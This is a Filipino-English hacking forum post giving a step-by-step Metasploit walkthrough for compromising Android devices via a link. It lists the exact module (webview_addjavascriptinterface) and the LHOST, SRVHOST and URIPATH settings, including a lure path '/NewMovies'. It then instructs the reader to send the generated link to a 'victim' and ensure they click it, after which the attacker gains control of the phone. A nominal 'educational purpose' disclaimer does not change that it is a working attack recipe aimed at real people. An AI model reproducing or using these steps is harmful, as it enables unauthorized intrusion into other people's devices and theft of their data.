What's new

Closed H4ck android with just a link

Status
Not open for further replies.

L Lawliet_25

Honorary Poster
Joined
Feb 20, 2018
Posts
282
Reaction
110
Points
191
Age
23
Yo Guys!! Sa wakas established member na din ako!! :)
May bago akong e-sha-share sa inyo!! Pero di ko mapapangako na 100% working ito :)
Para tohh sa mga kali users at mahilig sa h4ck1ng ...
*How to h4ck any android just by clicking/opening a link with metasploit in Kali linux

*Requirements*
Kali Linux
Internet Connection

Follow the steps lng mga kaPh

1.Open Metasploit Framework

2.Pagkatapos mag load, Type the command below:
use exploit/android/browser/webview_addjavascriptinterface

3.After e press ang Enter, Type: show options

4.Ngayon kailangan natin ang ip ng network mo...
Open a terminal then type: ifconfig

5.Pagkatapos e-enter ang command ay magdi-display lahat ng details ng network mo at hanapin mo doon ang ip address mo at e-copy...(Halimbawa kung ang Ip address nyo ay 127.0.0.9)

6.Ngayon bumalik ka doon sa Msf exploit mo then type: set LHOST 127.0.0.9

7.Type: set svrhost 127.0.0.9

8.Type: set URIPATH /NewMovies

9.Type: show options

10.Then type: run

11.Next after mo enter yung run ay magdi-display na yug link...
Then wag muna e-exit ang metasploit ...copy the created link and then send it to your victim be sure na e-cli-click nya yung link...
parang ganito ang magagawa nyong link You do not have permission to view the full content of this post. Log in or register now.

12.Pagkatapos nyang e-open ang link then agad na yun mag lo-load ulit yung metasploit nyo then after mag load type "show options" para makita ang mga command na magagamit mo sa pag h4ck sa device ng victim....




Yun lang gumana to sa akin .... btw for educational purpose lang to...
Kayo na bahala good luck...
 
Status
Not open for further replies.
Back
Top